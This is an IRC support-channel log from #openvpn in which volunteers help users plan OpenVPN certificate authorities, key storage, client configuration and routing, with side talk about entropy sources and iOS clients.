20:56 <+pekster> You essentially follow the official OpenVPN howto, just create the server-config on the dd-wrt. I've done openvpn+openwrt before, although I write my own configs and initscripts because the abstractions and GUIs are a pain
20:56 <+pekster> !howto
20:56 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
20:57 < kevinch> okay thanks I'll take a look, mind if I ask some questions along the way as I work through the guide?
20:58 <+pekster> If it's something the official howto explains I'll likely just refer you there. That said, are you confused on a particular part of the setup?
20:58 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit []
20:58 < kevinch> Just one question, for testing purposes can I try to get into my VPN from my local network?
20:59 <+pekster> Generally yes, although if you use the --redirect-gateway option, see the 'local' parameter in the manpage as you're likely to want that
21:00 <+pekster> It's not a good way to test external access of course, but otherwise you can establish a connection that way
21:01 < kevinch> okay thanks, just to make sure all my keys are correct and such. Also the questions that i was asked when I generated the keys, do those all have to have the same answers? If I put a different one by mistake or something should I regenerate them all?
21:03 <+pekster> Nothing really matters except the common name which needs to be unique for your certs (at least without hackish solutions)
21:03 <+pekster> If you do per-client rules (by way of ccd files or a --client-connect script) you'll need to refer to each client by its CN
21:03 < kevinch> okay thanks
21:03 < kevinch> its more to generate the random keys?
21:03 <+pekster> See the PKI part of the official howto for specifics
21:03 < kevinch> thank you
21:04 <+pekster> Well, they're not random, they're very specifically mathematically related with random primes used in the process, but sure, "random" is close enough :P
21:04 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 256 seconds]
21:07 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
21:09 < kevinch> haha okay
21:20 < Devastator> is it correct to say that it is not advisable to build cert/keys on the same machine openvpn runs?
21:21 < kevinch> couldn't get my connection to work
21:21 < kevinch> https://gist.github.com/anonymous/c63a6ec2ea26e31a2599
21:21 <@vpnHelper> Title: gist:c63a6ec2ea26e31a2599 (at gist.github.com)
21:21 <+pekster> Ideally you want your PKI on a separate system, but small installations sometimes ignore this. It is wise to generate your keys on the system that will use them and just send the request and cert across the wire
21:21 < kevinch> mind if you could take a quick peek pekster if you have a spare second
21:23 < kevinch> meh ill just try it tomorrow and play around a bit more with it
21:23 -!- kevinch [~kevinch@d24-57-197-43.home.cgocable.net] has left #openvpn []
21:24 <+pekster> 125 seconds is apparently too long for a reply. Oh well, my Ctrl-U still works nicely :)
21:27 < Devastator> pekster by "send the request and cert across the wire" you mean.. upload it?
21:28 <+pekster> Yea. There's no reason for a private key to be sent over the network
21:28 <+pekster> It's just generally bad practice
21:31 < Devastator> yes, that's exactly why I'm asking..
21:32 < Devastator> there is no point in having something to secure things if I don't follow good practices
21:34 < Devastator> so just to be sure, it will be like: #1 - install and configure server, #2 - go to the client machine, generate keys and cert, #3 - connect to the server with ftp, scp or whatever to upload the cert, #4 - connect to the vpn
21:34 < Devastator> something like that?!
21:35 <+pekster> The cert is signed by the CA
21:36 <+pekster> You generate the keypair and a CSR (Certificate Signing Request, sometimes called a .csr or .req file.) This is not sensitive, and sent (often in the clear) to the CA. The CA verifies this came from the client (eg: verbal verification of the fingerprint) and then signs it, producing a valid certificate. This is then sent (possibly in the clear) back to the client
21:36 <+pekster> Only the private keys are "secret" -- everything else in a PKI can be considered public
21:37 <+pekster> eg: attackers on the wire can actually swipe your public certificates exchanged between the clients
21:40 < Devastator> pekster pardon for such a lame question but.. can the CA be also called "openvpn server"?
21:41 <+pekster> They're completely separate. You may run them both on the same system if you'd like; the CA is merely a collection of files including, critically, the CA private key
21:41 <+pekster> The thing to remember is that compromise of your CA key compromises the entire infrastructure; compromise of a single non-CA keypair only compromises that client and the rest of the PKI is still secure
21:42 <+pekster> Application servers running a VPN tend to run more software than a CA does. You can even keep your CA PKI on an offline system stored on an encrypted USB drive kept in a vault, if you need that level of security
21:46 < Devastator> I did read the howto a few times, I did try to understand all, can I make a list of dumb questions on a pastebin then get back to you?
22:03 < Devastator> heheh I guess not..
22:05 <+pekster> Easier to ask here. You may even get answers, in between my glasses of wine and reading about DL14
22:06 <+pekster> Erm, DA14. That big round thing hurling just to the side of our planet
22:08 < Devastator> heheheh
22:24 < Devastator> PKI is kind of.. environment to build keys, certs, requests. CA PKI is part of PKI, to validate those certs, requests. am I understanding it correctly? The terminology confuses me a little, bear in mind I've never messed with VPN before
22:27 <+pekster> PKI = Public Key Infrastructure. The CA is the Central Authority, also often used to refer to the keypair at the "root" of the PKI. This CA is ultimately trusted by all peers (your servers and clients.)
22:28 <+pekster> All the keys are X.509 keypairs. There's actually nothing magic about the CA versus any of your other keypairs. It's just how they're laid out. The CA signs (cryptographically) each cert, and in the case of openvpn, adds some extra options that designate each certificate a "server" or "client" certificate, indicating what its purpose is
22:28 <+pekster> Wikipedia probably gives you a better, more basic description of X509 and PKI if you need
22:32 < Devastator> thanks!
22:33 < Devastator> well, creating a PKI on each client isn't much handful I guess
22:34 < Devastator> leaving PKI on the server itself is not recommended at all..
22:35 <@krzee> !tell krzee [hmac]
22:36 <@krzee> too lazy for msg syntax D
22:36 <@krzee> :D
22:40 < Devastator> pekster what would you do if you don't have an offline system to put the PKI there?
22:43 <@krzee> get one, or choose whatever you consider to be the next best thing to be it
22:46 <+pekster> I have an online "admin" host internally. It doesn't run much, has slightly higher security standards. Some of my PKI runs off there, some of it is just an intermediate CA with offline roots kept in a secure location
22:47 <+pekster> Locked vaults and armed gards are not suitable for every installation ;)
22:47 <+pekster> guards. First of many typos tonight I'll blame on the wine
22:47 < Devastator> hahahah
22:47 < Devastator> don't worry
22:48 < Devastator> I'm just trying to figure a way of doing so it can be portable and easy to generate/sign certs etc etc
22:49 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
22:49 <+pekster> Run it all off your VPN server if you'd like. That's not appropriate in larger deployment situations, and most companies (even medium-ish ones, 50+ employees) tend to have policies about such things
22:50 <+pekster> There's nothing "wrong" about doing it like that, it's just not as secure in the event your VPN server (that also houses your PKI and CA root key) is compromised. Then you hope you discover the compromise before your key is brute-forced, and your server key can be assumed compromised anyway
22:52 < Devastator> if it were all linux clients.. but it's almost all windows, my idea would be to have PKI on a pendrive, then go to the client that I want to generate cert/request and use the PKI from the pendrive
22:53 <+pekster> That's a pain since frontends will be different on each host to manipulate your PKI, plus different openssl versions may have slightly different featuresets
22:54 <+pekster> In other words, you probably don't want to do that
22:54 <+pekster> Either do it all on a single box (like the official howto shows you) or learn more about what the CA actually does when it gets a CSR and signs it, generating the valid cert
22:55 <@krzee> !tell krzee [dh]
22:56 * pekster always imagines a prime sliding into home plate and an umpire yelling "Safe!" whenever openssl generates "safe primes" for diffie-hellman params
22:57 < Devastator> pekster ok, just to be sure again, and the official howto is not recommended because everything that an attacker needs will be there..
22:57 <+pekster> It's recommended if you don't really know what you're doing
22:57 <+pekster> From a security perspective, you split your critical infrastructure bits onto systems you deem secure enough
22:58 < Devastator> yes, time to know what I'm doing
22:58 <+pekster> Choose between doing it all on the server (convenient, less hardware and time required, but least secure) to using a completely offline CA on an encrypted disk stored in an armed, locked, biometric vault with security cameras (most secure, also the least user-friendly and most expensive.)
22:58 <+pekster> Or do something between those 2 extremes
22:59 -!- gardar [~gardar@gardar.net] has joined #openvpn
22:59 <+pekster> Or pay a company to do it all for you. Possibly very convenient, but out of your control and not free ;)
23:00 <@krzee> lol at umpire yelling "SAFE!"
23:01 < Devastator> something between those 2 extremes seems ok, will look into it 23:02 < Devastator> I will follow the howto for now, just to get the hang of configuring it at least 23:02 <+pekster> You can put it on a USB stick and boot a laptop off a live-CD for a middle-of-the-road approach 23:02 <+pekster> Encrypt the USB stick for another layer of protection, but the CA key has its own passphrase, unless you explicitly use -nodes with openssl 23:02 < Devastator> that seems doable 23:02 <+pekster> Ubuntu has Live-CDs, and rumor has it they even patched their openssl mess ;) 23:05 <+pekster> There's also xca, a GUI-frontend to generate CAs. I've never tried it, but there's some link to using it with openvpn: 23:05 <+pekster> !xca 23:05 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 23:06 <+pekster> You're less likely to get support for it (the howto is the official reference) but you're free to poke at it if you're willing to keep any broken pieces you end up with 23:06 < Devastator> if I understand anything, if I have a certs generated with Ubuntu version XY, openssl WZ, I will need to use the same openssl version if I want to sign/generate others 23:07 <+pekster> Well, it's more or less "version independent" but you don't want to mix different platforms. Easy-rsa includes the scripts at the top-level, and the .bat files are completely different than the bash scripts 23:07 <+pekster> You can also get surprised with openssl bugs between minor versions and the like. It's unwise to just willy-nilly plug your UBS stick with a PKI into a random machine and start issuing openssl commands 23:08 <+pekster> You don't need that "exact" version of openssl, no. Since you're multi-platform, your OS differences are going to cause you troubles at your skill level. 
Keep the PKI on one OS
23:08 < Devastator> got it, I'm just thinking if I would need the same live version/distro
23:08 <+pekster> Nope
23:09 < Devastator> alright!
23:10 <+pekster> You can re-do your PKI any time you want; you just need to replace the .key and .crt files on every host, including the ca.crt if you re-generated your CA too
23:10 < Devastator> tomorrow I will buy 2 usb sticks, I will leave one as backup just in case the #1 dies
23:10 <+pekster> I bought a 4-pack of 32 MB USB sticks years ago for offline PKI storage. Something like $5 on sale :)
23:10 < Devastator> 32GB?
23:10 <+pekster> No, 32 MB
23:10 <+pekster> I don't think you can buy them that small anymore ;)
23:11 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
23:11 < Devastator> sorry, I thought it was a wine typo again :)
23:11 < Devastator> indeed
23:11 < Devastator> 1GB should be fine, this will be my only vpn server..
23:12 < Devastator> it's ok to run it off my router/firewall, right?
23:12 <+pekster> 32M should be fine. the entire PKI takes up less than 1MB even after you issue dozens of certs
23:13 < Devastator> I don't have a services/daemons server.. also, I think 1GB is the smallest I will find hehe
23:14 <+pekster> I wouldn't "turn off" your firewall on any Internet-exposed system, no
23:16 < Devastator> s/off/on
23:16 < Devastator> excuse my english
23:16 <+pekster> http://pekster.sdf.org/misc/usb-32m.jpg
23:20 < Devastator> heheh, not available anymore
23:20 < Devastator> smallest I could find was 256MB
23:21 <+pekster> I have one of those too
23:22 < Devastator> for a few more cents... 4GB..
23:24 <+pekster> Yea, I know. You can't buy them like you used to
23:24 <+pekster> I dunno what I paid for that blister pack. Maybe $5 after shipping
23:25 <+pekster> 128 MB between the 4 sticks!
23:26 < Devastator> I'm going to buy the smallest I can find, format it with LVM and try
23:30 <+pekster> LVM on USB? Okay...
23:30 < Devastator> hum.. never encrypted anything, it was a long shot heheheh
23:31 <+pekster> You still need an actual filesystem on top of it, unless you plan to hexedit all your keys onto a raw block device...
23:31 <+pekster> Use a normal filesystem unless you know what you're doing. Better yet, start with the howto guide so you know what you're doing before you burn a bunch of bits to the flash memory on your new USB devices
23:32 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
23:32 -!- mode/#openvpn [+o krzee] by ChanServ
23:32 <+pekster> The keys are already encrypted. An encrypted filesystem gives you more security, another layer to the crown jewels so to speak. The more secure you are the harder it is for an attacker who breaks into your house and steals your offline key storage, and the harder it is for you to use your own PKI. This is your ever-present choice in security
23:33 <+pekster> Buy a safe deposit box. Buy 2, in different cities in case one gets robbed so you still have your backup. etc, etc.
23:33 <@krzee> !tell krzee [sample]
23:34 <+pekster> I'm sure krzee has safe deposit boxes for his PKI ;)
23:34 <@krzee> cameras and offline
23:34 <@krzee> =]
23:35 <@krzee> *flex*
23:35 <@krzee> oh and an armed guard!
23:35 <@krzee> (the guard and the cameras are not for the pki, but it felt like a good place to keep the pki)
23:35 <@krzee> !shotgun
23:35 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun.
23:39 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has joined #openvpn
23:39 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has quit [Client Quit]
23:40 < Devastator> hahahahah
23:47 < Devastator> pekster this is what I might follow after my initial experience with the howto: http://linuxconfig.org/usb-stick-encryption-using-linux
23:47 <@vpnHelper> Title: USB stick encryption using Linux (at linuxconfig.org)
23:51 <@krzee> pekster, played with the ios client?
23:52 <@krzee> when i did it i was able to load the files from itunes, now im somewhere else setting it up on an iphone that has no computer to sync to, yanno if that means i need to put everything in-line myself?
23:53 < Devastator> !howto
23:53 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
23:53 <+pekster> I own no apple devices
23:53 <+pekster> Nor do I want to
23:54 <+pekster> Someday I might need to buy one of those desktop cube-ish things to do Tunnelblick client development, and I'll only do that with a very long face
23:55 <+pekster> krzee: If you find the secret key out of the walled garden, let me know :P
23:55 <@krzee> appletv kicks butt as an xbmc device btw (although i hear theres nicer android devices now)
23:55 <@krzee> secret key walled garden?
23:57 <@krzee> learn inline as see http://www.packtpub.com/article/new-features-of-openvpn-2-1-and-2-2 for some info on putting certs directly into your config file
23:57 <@vpnHelper> Title: New Features of OpenVPN 2.1 and 2.2 | Packt Publishing (at www.packtpub.com)
23:57 <@krzee> heh
23:57 <@krzee> !learn inline as see http://www.packtpub.com/article/new-features-of-openvpn-2-1-and-2-2 for some info on putting certs directly into your config file
23:57 <@vpnHelper> Joo got it.
--- Day changed Wed Feb 06 2013
00:00 < Devastator> interesting, there are two KEY_EMAIL in vars, one with ", one without..
00:00 <@krzee> prolly in different blocks
00:01 < Devastator> can I put the same on both?
00:02 <@krzee> i put not@real
00:02 <@krzee> so sure :-p
00:03 <@krzee> not like openssl is going to send you an email or anything
00:03 <@krzee> its only there for you
00:03 <+pekster> Your X509 details are sent in the clear (DER-encoded, but it's not encrypted, so anyone can see the name/city/state/email you use. FYI)
00:04 < Devastator> thanks! for me to not bother you guys for each KEY_, is there a paper explaining each? there's KEY_CN=changeme, but howto doesn't mention it..
00:05 <+pekster> Leave that; you set it each key you generate
00:05 <+pekster> The howto explains the easy-rsa process
00:05 <+pekster> !howto
00:05 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
00:06 < Devastator> got it, I just changed what howto told me, I will leave the rest as default
00:11 < Devastator> building diffie-hellman
00:14 <@krzee> haha i have 8kb configs now
00:14 <+pekster> krzee: You ever watch that facthacks talk? So much of those keys are redundant anyway
00:15 <@krzee> watched it 3 times
00:15 <@krzee> damn good talk
00:16 <+pekster> Now go re-generate your keys on any embedded hardware you're using ;)
00:16 <@krzee> got lucky, never used embedded for keygen
00:16 <@krzee> more luck than thinking ahead tho
00:17 <+pekster> I actually looked into it as there's fairly little literature about the entropy problem of Linux+embedded. I found a whitepaper from the mid 2000's though
00:17 <@krzee> makes sense tho
00:17 <+pekster> Here it is: http://eprint.iacr.org/2006/086.pdf
00:23 <@krzee> "Since a physical source of randomness is often too costly, most systems use a pseudo-random number generator."
00:23 <@krzee> umm, arent physical sources of randomness also pseudo-random?
00:25 < Devastator> can I test the vpn from inside the network?
00:25 <@krzee> are you sharing the lan?
00:25 <@krzee> or redirecting internet?
00:26 < Devastator> no, it's internet->wireless router->clients (one of those clients is actually the vpn server)
00:26 <@krzee> what is the purpose of the vpn?
00:26 < Devastator> I'm gonna run it at my company when I'm done with testing
00:26 <@krzee> heh
00:27 <@krzee> !goal
00:27 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
00:27 <@krzee> like that ^
00:27 < Devastator> sorry, my goal is to access my company's router from home over a secure connection
00:28 <@krzee> ok, so basically sharing the lan
00:28 < Devastator> right now I'm building the actual new company router at home.. before putting it in production
00:29 <@krzee> so nope, cant really test from within the same lan
00:29 <@krzee> you can comment out the lan sharing stuff, and then test
00:29 <@krzee> but you'll need to test to the lan ip
00:29 <@krzee> by "lan sharing stuff" i mean --route and --push "route...
00:30 < Devastator> yes, it's commented out
00:31 < Devastator> let's see
00:36 < Devastator> what's the factoid for windows clients?
00:36 < Devastator> openvpn clients
00:36 <@krzee> !download
00:36 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all.
It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
00:36 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
00:36 <@krzee> #1
00:36 <+pekster> krzee: See: random.org for RNG, not PRNG ;)
00:37 <@krzee> after i hook up these 2 ipads / 2 iphones to this vpn
00:38 <@krzee> ios = suck
00:38 <+pekster> Hardware RNG cards exist to connect to a sound card for instance and use ambient noise, but for "most" people PRNG is "good enough"
00:38 <@krzee> but thats just another source of entropy
00:38 <@krzee> like a prng can use
00:39 <+pekster> PRNG comes up with the random data based on written computer code. True "random" data comes from atmospheric radiation or the like
00:39 <@krzee> many prng use sources of entropy when doing so
00:40 <@krzee> such as sound card or video card, network card, whatev
00:40 <+pekster> Not really
00:40 < Devastator> I swear I will not be so dumb in a few weeks using vpn :)
00:40 <+pekster> Interrupts, disk I/O delay, keyboard, and mouse are your standard entropy sources for Linux
00:40 <@krzee> the paper you linked to me said it too
00:40 <+pekster> Nothing to do with your sound card
00:40 <+pekster> (in most cases, unless you have specialized hardware)
00:40 <@krzee> most systems use a pseudo-random number generator. The state of the generator is seeded, and periodically refreshed, by entropy which is gathered from physical sources (such as from timing disk operations, or from a human interface).
00:41 <+pekster> Right
00:41 <+pekster> Former = Disk I/O (ie: delay between disk seeks)
00:41 <+pekster> latter = keyboard+mouse
00:42 <@krzee> there something special about an audio device that it couldnt be used like those?
00:42 <+pekster> One of my 2 headless boxes has low disk I/O, no mouse, no keyboard, and minimal disk activity.
The entropy pool is generally very low on that one, compared to the one that does 24/7 torrenting
00:42 <@krzee> (from software)
00:42 <+pekster> Sure: the fact that an audio card is not usually connected to a microphone ;)
00:42 <@krzee> my laptop is
00:42 <+pekster> (Plus more technical issues of normalizing gain, and assuring that it's a valid source of really "random" entropy)
00:42 <@krzee> 24/7
00:43 <@krzee> the hw device would have those hurdles too
00:43 <@krzee> my bob marley song isnt quite random
00:43 <@krzee> regardless of sw or hw
00:43 <+pekster> Not if it has software to figure that all out on integrated chips
00:43 <+pekster> You can't exactly design IC's in the kernel code ;)
00:43 <@krzee> why would said software need to be on chips?
00:44 * krzee smacks himself "back to work krzee!"
00:44 <@krzee> bbiaf =]
00:44 <+pekster> You need to figure out if it's a valid source of random before you use it. A sine wave connected via your audio cable would be Very Bad, for instance
00:45 <@krzee> but ill still be interested in this!
00:45 <+pekster> Debian tried the --just-trust-us option on randomness, and it failed. Badly.
00:45 <@krzee> definitely not trying to get out of the conversation
00:45 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
00:53 < Devastator> how should be the path for windows ca.crt etc etc? Tried C:\Program Files\OpenVPN\, should I put " "?
00:54 <+pekster> The manpage explains that just a couple pages in
00:55 <+pekster> Examples you can almost copy and paste even ;)
00:56 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Quit: No Ping reply in 180 seconds.]
00:56 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn
00:57 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
01:01 < Devastator> yep "C:\\....\\"
01:02 < Devastator> thanks!
01:05 < Devastator> it seems to have worked
01:06 < Devastator> windows has a "tap windows adapter" even though I'm using tun, but I guess it's normal
01:08 <+pekster> It's just the nomenclature. The code refers to "tun.c" even for tap-stuff
01:09 < Devastator> I can't thank you guys enough
01:09 < Devastator> that first experience (it's really the first) taught me a lot
01:28 <@krzee> cant find the file [inline]
01:29 * krzee punches ios
01:30 <+pekster> Oh, so. Walled garden: as in "Apple's walled garden." It's so pretty, why would you ever want to leave?
01:30 <@krzee> i guess ill try the other way
01:30 <@krzee> oh dude, i only android
01:30 <@krzee> but these 4 devices arent mine
01:30 <@krzee> i guess i do have an ipod touch too, but that was no problem since i sync to computer
01:30 <@krzee> add files, done
01:30 <+pekster> Just try not to eat the apple, k? :P
01:31 <@krzee> however, for laptop...
01:31 <@krzee> MacBookPro CPU: Intel Core i7 M 620 2.67GHz @ 2.66GHz [SSE3/SSSE3/SSE4.1/SSE4.2/x86_64/PAE/XD/VT/EST/OctaCore] L3: 4MB QPI: 4.8 GT/s RAM: 4.2GB/8.0GB swap: 0.00M/64.00M Disk: 162.28GB/173.85GB GPU: NVIDIA GeForce GT 330M & Intel HD Graphics [512 MB & 288 MB/Stock] 1920x1200 OS: Mac OS X 10.7.5 (11G63) Kernel: 11.4.2 Arch: 64 Bit
01:31 <+pekster> I got briefly excited that you were running 64-bit ArchLinux. Then I so the OS.
01:32 <+pekster> saw*
01:32 -!- hid3 [~arnoldas@78.157.71.116] has joined #openvpn
01:32 <+pekster> It's been a couple versions ago for both Mac OS and Tunnelblick, but I had great results there. The pre-packaged deployment thing was really slick
01:32 < hid3> Hello everyone. Can I disable the status logging each minute on the OpenVPN server?
01:33 <@krzee> dont use --status
01:33 <@krzee> hehe
01:33 <+pekster> I like dumping the --status update to a tmpfs location, like /tmp or /run on modern distros
01:34 < hid3> or /ram (which is a symlink to /dev/shm)
01:34 < hid3> but I've never needed that file, anyway
01:34 < hid3> seems to be really useless
01:34 <+pekster> It's handy when you want to see if $user is connected, or who has the VPN IP $naughty_person
01:35 <@krzee> !management
01:35 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN
01:35 <@krzee> ^ more handy for that
01:35 <+pekster> Not really. 'telnet localhost 9876' status?'
01:35 <@krzee> scripts!
01:35 <+pekster> vs: cat /tmp/vpn1.status?
01:35 <@krzee> expect script
01:35 <+pekster> expect is not as convenient compared to cat. Not in my book :P
01:35 <@krzee> ild be happy to kickdown if interested
01:36 <@krzee> ./showusers.sh
01:36 <@krzee> management interface can do a bit more too ;]
01:36 <@krzee> like disconnect $naughty_person
01:36 <+pekster> Right
01:37 < hid3> okay, so disabled the status log file...
01:37 <+pekster> I also found admins liked to leave hanging shells connected to the management port :\
01:38 <@krzee> grr i sent all the files via email instead of inline, that doesnt work either
01:38 <+pekster> Sure, I could kill their ssh/screen sessions, but it was better not to encourage that behaviour to begin with ;)
01:38 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 256 seconds]
01:38 <+pekster> And no, I wasn't about to write a multi-user frontend in Java for them to access it with ;)
01:38 <@krzee> me either
01:39 <@krzee> ild do it in bash :D
01:39 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn
01:39 <+pekster> Oh yea?
http://xkcd.com/378/
01:39 <@vpnHelper> Title: xkcd: Real Programmers (at xkcd.com)
01:39 <@krzee> butterfly
01:39 <+pekster> hid3: You were referring to the status file, not something in the logs every 1/m, right?
01:40 <@krzee> dont need to click :D
01:40 < hid3> pekster: probably. It got updated/truncated each minute. And I only have a few clients for a few hours a few times a year connected...
01:41 <+pekster> Sounds like the status file then. Doesn't hurt much beyond a few CPU cycles, although it'll cause problems if you wanted disks to spin down or burning holes in flash memory ;)
01:42 < hid3> Yeah...
01:42 < hid3> And besides, I found it only yesterday to be such, never heard of this file. Useless completely, for me.
01:44 <+pekster> Same output you can get in your standard log output by sending SIGUSR2
01:44 <+pekster> It just keeps it separately for people who want it output more often
01:44 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
01:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
01:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Read error: Connection reset by peer]
01:48 < hid3> Okay, one more question. Can I have 'server 192.168.0.0 255.255.255.0' in my config file combined with 'push "route 192.168.0.0 255.255.248.0"' line? Won't that cause any routing/reachability problems?
01:50 <+pekster> That's valid, although clients will get both the more specific /24 route and also get pushed the larger /21
01:50 < hid3> great, thanks
01:50 <+pekster> They'll both be sent via the VPN tunnel, so it doesn't really matter
01:51 <+pekster> That's kind of a bad network range to push given the potential for conflict with home-routing equipment
01:53 < hid3> not a problem for me (I'm the only user here)
01:53 < hid3> home network gets 10.x.x.x or 172.x.x.x
01:57 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
02:00 < hid3> connection reset by bear
02:01 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
02:01 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
02:01 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
02:02 -!- mode/#openvpn [+o krzee] by ChanServ
02:07 -!- mattock is now known as mattock_afk
02:12 -!- sickness\ is now known as Sickness\
02:14 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 260 seconds]
02:15 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
02:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds]
02:18 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
02:20 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
02:20 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
02:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
02:20 -!- mode/#openvpn [+o krzee] by ChanServ
02:20 <@krzee> annoyance after annoyance
02:21 <@krzee> i told this netgear router to use 8.8.8.8 for dns, it has nowhere to change what DNS is given to connected clients (only gives itself), but it is not handling dns itself
02:21 <@krzee> yayfun!
02:22 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection]
02:28 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
02:31 <+pekster> A better router krzee needs to go advance his plight. When reading in iambic time these rules will set you right.
02:34 <@krzee> hahaha
02:38 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 264 seconds]
02:41 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
02:51 -!- mattock_afk is now known as mattock
03:10 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
03:42 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
03:46 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 260 seconds]
03:54 <@krzee> !forget inline
03:54 <@vpnHelper> Joo got it.
03:54 <@krzee> i should contact jjk and let him know inline is slightly different than that
03:55 <@krzee> no [inline], just the xml style
03:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
03:58 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
04:00 <@krzee> and BOOYA its working
04:01 <@krzee> vpn server is on dynamic ip, behind 2 nat routers
04:01 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds]
04:01 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
04:01 <@krzee> currently watching the camera system from an iphone's 4g
04:01 * krzee punches himself for even doing this
04:12 -!- ade_b [~Ade@95.209.143.40.bredband.tre.se] has joined #openvpn
04:12 -!- ade_b [~Ade@95.209.143.40.bredband.tre.se] has quit [Changing host]
04:12 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
04:20 -!- zz_AsadH is now known as AsadH
04:38 -!- _mnathani_ is now known as mnathani
04:45 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 276 seconds]
04:49 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
04:53 -!- APTX_ [APTX@unaffiliated/aptx] has joined #openvpn
04:53 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds]
04:54 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn
04:56 -!- dazo_afk is now known as dazo
05:04 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has quit [Quit: Leaving]
05:05 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has joined #openvpn
05:05 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has quit [Read error: Connection reset by peer]
05:08 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
05:08 -!- APTX_ [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds]
05:09 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn
05:12 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
05:22 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds]
05:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
05:34 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 255 seconds]
05:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
05:38 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds]
05:38 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
